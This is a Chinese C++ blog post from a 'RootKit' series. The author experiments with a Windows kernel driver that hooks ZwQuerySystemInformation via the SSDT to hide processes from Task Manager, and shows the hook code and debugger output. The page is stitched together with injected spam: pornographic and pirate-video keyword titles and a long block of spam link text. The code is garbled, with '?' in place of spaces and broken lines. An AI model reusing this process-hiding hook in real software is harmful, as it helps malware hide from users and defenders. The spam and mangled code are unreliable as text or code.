青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運(yùn)轉(zhuǎn),開(kāi)心的工作
簡(jiǎn)單、開(kāi)放、平等的公司文化;尊重個(gè)性、自由與個(gè)人價(jià)值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁(yè) :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

HOOK SSDT Hide Process (八)

Posted on 2009-10-28 14:38 S.l.e!ep.¢% 閱讀(346) 評(píng)論(0)  編輯 收藏 引用 所屬分類(lèi): RootKit
HOOK SSDT Hide Process (七)

HOOK SSDT Hide Process (七)? 的代碼雖然隱藏了進(jìn)程,但會(huì)導(dǎo)致在 taskmgr.exe 全部進(jìn)程看不到
而且運(yùn)行一段時(shí)間后, taskmgr.exe 就會(huì)非法關(guān)閉

Q:
今天突然發(fā)現(xiàn),如果 taskmgr.exe 中選中了 'Show processes from all users' 選項(xiàng),還是可以看到其它進(jìn)程的(taskmgr.exe成功隱藏),但為什么不選中就所以進(jìn)程看不到?這么鬼異的問(wèn)題估計(jì)要OD下 taskmgr.exe 才知道

為了一查究竟,我把 MyZwQuerySystemInformation 修改成如下的代碼
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?
//定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
&process_name,?L"taskmgr.exe");
????
????rc?
=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if(NT_SUCCESS(rc))?
????{
????????
????????
if(5?==?SystemInformationClass)
????????{?
????????????
????????????
struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????
struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????
//if(curr->NextEntryDelta)
????????????
//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????
while(curr)
????????????{
????????????????????????????????KdPrint((
"ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????
if(curr->NextEntryDelta)
????????????????????curr?
=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????
else
????????????????????curr?
=?NULL;
????????????????????
????????????????
????????????}
//?while(curr)?
????????????????????????
????????????????????????????????UnHook();????????????

????????}
//?if(5?==?SystemInformationClass)
????????
????}
//?if(NT_SUCCESS(rc))
????


????
//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
????return?rc;
}

在 DebugView 中顯示的內(nèi)容如下:
Entry?Hook?Function!
Entry?Hook()
KeServiceDescriptorTable
->ServiceTableBase?is?:0x804e2d20
OldZwQuerySystemInformation?
is?:0x8057cc27
MyZwQuerySystemInformation?
is?:0xf8f0c080
Leave?DriverEntry
!
ProcessName:(
null)?NextEntryDelta:248?
ProcessName:System?NextEntryDelta:
3528?
ProcessName:smss.exe?NextEntryDelta:
400?
ProcessName:csrss.exe?NextEntryDelta:
912?
ProcessName:winlogon.exe?NextEntryDelta:
1304?
ProcessName:services.exe?NextEntryDelta:
1176?
ProcessName:lsass.exe?NextEntryDelta:
1360?
ProcessName:vmacthlp.exe?NextEntryDelta:
280?
ProcessName:svchost.exe?NextEntryDelta:
1360?
ProcessName:svchost.exe?NextEntryDelta:
656?
ProcessName:svchost.exe?NextEntryDelta:
3664?
ProcessName:svchost.exe?NextEntryDelta:
464?
ProcessName:svchost.exe?NextEntryDelta:
1104?
ProcessName:explorer.exe?NextEntryDelta:
920?
ProcessName:spoolsv.exe?NextEntryDelta:
848?
ProcessName:VMwareService.exe?NextEntryDelta:
416?
ProcessName:VMwareTray.exe?NextEntryDelta:
280?
ProcessName:VMwareUser.exe?NextEntryDelta:
536?
ProcessName:ctfmon.exe?NextEntryDelta:
272?
ProcessName:wscntfy.exe?NextEntryDelta:
272?
ProcessName:alg.exe?NextEntryDelta:
584?
ProcessName:cmd.exe?NextEntryDelta:
264?
ProcessName:conime.exe?NextEntryDelta:
272?
ProcessName:DriverMonitor.exe?NextEntryDelta:
608?
ProcessName:notepad.exe?NextEntryDelta:
272?
ProcessName:taskmgr.exe?NextEntryDelta:
400?
ProcessName:Dbgview.exe?NextEntryDelta:
0?
Unhook?leave
!

接著再做一個(gè)嘗試,如果直接把第二個(gè)線程的信息的 NextEntryDelta 改為0 , 是不是 taskmgr.exe 就會(huì)只顯示一條線程?
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?
//定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
&process_name,?L"taskmgr.exe");
????
????rc?
=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if(NT_SUCCESS(rc))?
????{
????????
????????
if(5?==?SystemInformationClass)
????????{?
????????????
????????????
struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????
struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????
if(curr->NextEntryDelta)
????????????????????????{
??????????????????????????curr->NextEntryDelta?=?0;
????????????}
????????????????????????
????????????????????????
//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????????????????
/*
????????????while(curr)
????????????{
????????????????????????????????KdPrint(("ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????if(curr->NextEntryDelta)
????????????????????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????else
????????????????????curr?=?NULL;
????????????????????
????????????????
????????????}//?while(curr)?
????????????????
*/????????
?????????????????
//???????????????UnHook();????????????

????????}
//?if(5?==?SystemInformationClass)
????????
????}
//?if(NT_SUCCESS(rc))
????


????
//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
????return?rc;
}


情況還是?taskmgr.exe 中選中了 'Show processes from all users' 選項(xiàng),就會(huì)顯示一條 System Idle Process 線程,如果不選中
'Show processes from all users' 這個(gè)選項(xiàng),那么 Taskmgr.exe 的列表就會(huì)顯示為空

curr->NextEntryDelta?=?0; 那為何不把 curr 之后的數(shù)全部置為 0x00 ?
于是,加多幾句代碼

??????????????if(curr->NextEntryDelta)
????????????{
??????????????????????????KdPrint((
"SystemInformationLength:%d?\n",?SystemInformationLength));
??????????????????????????curr->NextEntryDelta?=?0;
??????????????????????????memset((
void*)((ULONG)curr?+?curr->NextEntryDelta),?0x00,?SystemInformationLength?-?curr->NextEntryDelta);
????????????}

此時(shí),無(wú)論有無(wú)選中 'Show Process From all users'選項(xiàng),所有進(jìn)程都不顯示在 taskmgr.exe 了
另外還發(fā)現(xiàn)兩個(gè)現(xiàn)象
Q1. taskmgr.exe 調(diào)用 ZwQuerySystemInformation 時(shí),ReturnLength?指針總是傳 NULL
Q2. taskmgr.exe 調(diào)用 ZwQuerySystemInformation 時(shí),SystemInformationLength 總是傳 0x6000
難道 taskmgr.exe 并不是通過(guò) NextEntryData 這個(gè)值來(lái)定位到下個(gè)進(jìn)程的信息的?

?

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲男人第一av网站| 狼人天天伊人久久| 欧美一区视频| 亚洲一区二区三区在线观看视频| 狠狠色丁香久久婷婷综合_中| 国产精品久久久久久久app| 欧美成人精品激情在线观看| 久久亚洲影音av资源网| 久久精品夜色噜噜亚洲aⅴ| 欧美亚洲综合网| 久久色在线观看| 久久综合九色九九| 欧美日韩精品系列| 国产精品一区在线观看| 狠狠色狠狠色综合系列| 日韩视频免费观看| 亚洲欧美日韩高清| 久久亚洲精品伦理| 国产精品一区在线观看你懂的| 国产精品一区二区三区久久| 狠狠色狠狠色综合| 亚洲四色影视在线观看| 免费视频一区| 亚洲亚洲精品三区日韩精品在线视频| 亚洲欧美日韩国产综合在线| 久久一区中文字幕| 国产欧美一二三区| 亚洲青色在线| 久久久久天天天天| 制服丝袜亚洲播放| 欧美成人免费在线| 韩国v欧美v日本v亚洲v| 亚洲欧美精品在线| 亚洲电影在线| 久久色中文字幕| 国产亚洲精品bt天堂精选| 99伊人成综合| 9国产精品视频| 欧美日韩国产限制| 在线午夜精品| 日韩一级片网址| 欧美伦理91i| 一本色道久久| 制服丝袜激情欧洲亚洲| 国产精品高潮呻吟久久| 99re热这里只有精品免费视频| 女生裸体视频一区二区三区| 久久久久青草大香线综合精品| 国内精品久久久久久影视8 | 国产精品超碰97尤物18| 99精品欧美| 亚洲自拍啪啪| 午夜精品一区二区三区在线视 | 国产日韩欧美在线视频观看| 亚洲欧美国产三级| 亚洲天堂视频在线观看| 国产日韩精品一区二区| 欧美va天堂va视频va在线| 欧美成人一区二区三区在线观看| 亚洲日本欧美日韩高观看| 亚洲三级色网| 国产精品中文字幕欧美| 免费欧美高清视频| 欧美午夜精品一区| 欧美国产先锋| 国产精品专区h在线观看| 久久一区亚洲| 欧美日韩ab片| 美女黄毛**国产精品啪啪| 欧美日韩亚洲一区二区三区| 久久综合九色综合欧美就去吻 | 亚洲国产精品成人综合| 欧美日韩午夜激情| 亚洲精品激情| 亚洲国产一区视频| 久久午夜视频| 久久米奇亚洲| 国产日产欧产精品推荐色| 中文日韩在线视频| 亚洲精品久久视频| 欧美日本三级| 一区二区激情视频| 欧美在线免费视屏| 香蕉av777xxx色综合一区| 欧美激情小视频| 99精品视频免费在线观看| 亚洲一区二区毛片| 欧美视频在线视频| 亚洲美女中文字幕| 亚洲欧美日韩综合aⅴ视频| 欧美日韩性生活视频| 亚洲天堂网站在线观看视频| 欧美一区二区私人影院日本| 国产在线视频不卡二| 久久国产精品久久久久久久久久| 久久久久免费视频| a4yy欧美一区二区三区| 欧美三区在线视频| 久久99伊人| 一区二区国产精品| 免费在线观看精品| 午夜欧美不卡精品aaaaa| 韩国av一区二区| 欧美日韩国产麻豆| 久久青草欧美一区二区三区| 亚洲精品国精品久久99热| 久久综合给合| 99天天综合性| 亚洲福利久久| 国产一区二区三区丝袜| 欧美日韩国产色综合一二三四 | 久久精品国产久精国产爱| 亚洲高清av在线| 一区二区在线视频观看| 国产精品午夜春色av| 欧美日韩国产经典色站一区二区三区| 香蕉亚洲视频| 午夜日韩福利| 亚洲免费视频在线观看| 在线免费观看日韩欧美| 欧美日韩色婷婷| 欧美aaaaaaaa牛牛影院| 美女图片一区二区| 久热精品在线| 欧美a级片网站| 欧美激情在线免费观看| 欧美精品一区二区三区在线播放 | 久久中文久久字幕| 麻豆av一区二区三区| 麻豆精品视频在线观看| 欧美极品欧美精品欧美视频| 欧美激情亚洲视频| 国产精品捆绑调教| 国产一区香蕉久久| 91久久精品国产91久久性色tv| 亚洲国产高清高潮精品美女| 日韩午夜激情| 久久av一区| 亚洲人成久久| 久久成人精品无人区| 欧美女主播在线| 国产一区二区三区四区老人| 99成人精品| 另类天堂视频在线观看| 夜色激情一区二区| 免费在线播放第一区高清av| 国产精品av久久久久久麻豆网| 雨宫琴音一区二区在线| 亚洲综合精品一区二区| 亚洲国产精品久久久久婷婷老年| 亚洲午夜高清视频| 欧美视频中文字幕在线| 亚洲精品久久久久久久久| 麻豆精品精华液| 久久av资源网站| 国内精品一区二区三区| 久久一区激情| 久久久久久久久久久久久女国产乱 | 久久av红桃一区二区小说| 国产精品夜色7777狼人| 午夜精品美女久久久久av福利| 亚洲精品综合在线| 欧美无乱码久久久免费午夜一区 | 欧美不卡视频一区| 亚洲国产欧美久久| 亚洲精品久久| 国产精品久久久久久久久久直播| 亚洲综合成人婷婷小说| 亚洲一区久久久| 国产亚洲欧美在线| 欧美国产精品v| 欧美精品videossex性护士| 国产一区二区在线免费观看| 久久一区二区三区超碰国产精品| 久久久久久9| 亚洲福利视频在线| 国产精品男女猛烈高潮激情| 久久久精品免费视频| 欧美成人精品一区二区| 在线亚洲欧美专区二区| 亚洲一区二区三区国产| 在线视频成人| 亚洲——在线| 中国日韩欧美久久久久久久久| 亚洲欧美一区二区三区在线| 亚洲精品三级| 玖玖国产精品视频| 欧美综合激情网| 欧美色视频一区| 亚洲欧洲偷拍精品| 狠狠色丁香久久婷婷综合_中| 99爱精品视频| 一区二区三区视频在线观看| 午夜精品久久久久久久99热浪潮| 久久精品一区二区三区不卡| 亚洲天堂av电影| 欧美乱在线观看| 99精品热视频只有精品10| 亚洲狼人精品一区二区三区| 久久伊人精品天天|